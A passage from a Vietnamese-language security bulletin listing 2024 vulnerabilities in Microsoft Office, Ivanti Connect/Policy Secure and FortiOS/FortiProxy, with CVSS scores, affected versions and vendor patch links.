Microsoft Exchange Server 2019 Cumulative Update 13
Microsoft Exchange Server 2016 Cumulative Update 23
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410
3.1.4 CVE-2024-21413– Microsoft Office Remote Code Execution Vulnerability.
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công vượt qua cơ chế bảo vệ Office Protected View, tệp tin sẽ đươc mở ở chế độ cho phép chỉnh sửa thay vì chế độ bảo vệ (protected mode) từ đó có thể dẫn đến thực thi mã từ xa.
Phiên bản ảnh hưởng:
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for 64-bit editions
Microsoft Office 2019 for 32-bit editions
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2024- 22024 – (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
CVSS: 8.3/10
Mô tả: Tồn tại lỗ hổng XXE trong SAML component ảnh hưởng đến vanti Connect Secure và Ivanti Policy Secure cho phép kẻ tấn công không cần xác thực, truy cập vào các tài nguyên bị hạn chế bằng cách tạo các tệp XML độc hại
Phiên bản ảnh hưởng:
Ivanti Connect Secure: 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1, y 22.5R2.2
Ivanti Policy Secure: 22.5R1.1 y ZTA 22.6R1.3.
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
3.2.2 CVE-2024-21762 – Out-of-bound write vulnerability
CVSS: 9.6/10
Mô tả: Tồn tại lỗ hổng out-of-bounds write cho phép kẻ tấn công không cần xác thực thực thi mã từ trên hệ thống bị ảnh hưởng.
Phiên bản ảnh hưởng:
FortiOS 7.4 phiên bản từ 7.4.0 đến 7.4.2
FortiOS 7.2 phiên bản từ 7.2.0 đến 7.2.6
FortiOS 7.0 phiên bản từ 7.0.0 đến 7.0.13
FortiOS 6.4 phiên bản từ 6.4.0 đến 6.4.14
FortiOS 6.2 phiên bản từ 6.2.0 đến 6.2.15
FortiOS 6.0 tất cả các phiên bản
FortiProxy 7.4 phiên bản từ 7.4.0 đến 7.4.2
FortiProxy 7.2 phiên bản từ 7.2.0 đến 7.2.8
FortiProxy 7.0 phiên bản từ 7.0.0 đến 7.0.14
FortiProxy 2.0 phiên bản từ 2.0.0 đến 2.0.13
FortiProxy 1.2 tất cả các phiên bản
FortiProxy 1.1 tất cả các phiên bản
FortiProxy 1.0 tất cả các phiên bản
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.fortiguard.com/psirt/FG-IR-24-015
3.2.3 CVE-2024-21888 – Privilege Escalation for Ivanti Connect Secure and Ivanti Policy Secure
CVSS: 8.8/10
Mô tả: Tồn tại lỗ hổng leo thang đặc quyền trong for Ivanti Connect Secure và Ivanti Policy Secure cho phép kẻ tấn công nâng cao đặc quyền từ người dùng lên quyền quản trị viên
Phiên bản ảnh hưởng:
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: